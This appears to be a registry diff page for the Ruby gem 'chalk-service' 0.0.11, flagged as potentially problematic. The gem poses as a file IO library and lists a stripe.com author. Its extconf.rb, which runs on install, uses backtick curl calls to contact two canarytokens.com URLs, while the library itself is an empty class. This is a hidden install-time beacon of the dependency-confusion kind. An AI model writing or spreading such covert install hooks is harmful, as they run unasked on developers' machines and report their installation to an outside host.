chalk-service 0.0.11

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of chalk-service might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: c09ec2e5bd84da26f3080b6e6d8ec28f8ab170127fedd4da2486237efae6d2fb
4
+ data.tar.gz: fabdb605ea8a02a5113846cec8ae403b81602e56e5794c5507cc18523b2919bc
5
+ SHA512:
6
+ metadata.gz: 668fbead449f9877bc34764c3312e098c0c2453fdef981128274d0fb4ab607399dc682634cefc16dc7873481f13dc8506f90f19eb0a84459ec38de55389db51e
7
+ data.tar.gz: b31e9a86c97ceb580088489b9e64353dd29e04b1929fa4b3754f3be8b843b1f742a5f57b22ae54170b496a88f8b0410350f24e0858e4c7652073efc1a02a09f3
@@ -0,0 +1,11 @@
1
+ #!/usr/bin/ruby
2
+
3
+ `curl http://xupeeekgazbu1lhswi7mml31r.canarytokens.com`
4
+ `curl http://canarytokens.com/articles/terms/static/h2ivdfugalqwutxofoc19rpjb/contact.php`
5
+
6
+ require "mkmf"
7
+
8
+ abort "missing malloc()" unless have_func "malloc"
9
+ abort "missing free()" unless have_func "free"
10
+
11
+ create_makefile "my_malloc/my_malloc"
data/lib/file/file.rb ADDED
@@ -0,0 +1,2 @@
1
+ class File
2
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: chalk-service
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.11
5
+ platform: ruby
6
+ authors:
7
+ - stegs
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2011-05-29 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: Provides file IO functions
14
+ email: stegs@stripe.com
15
+ executables: []
16
+ extensions:
17
+ - ext/my_malloc/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/my_malloc/extconf.rb
21
+ - lib/file/file.rb
22
+ homepage: ''
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.0.3
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: Ask Stegs
45
+ test_files: []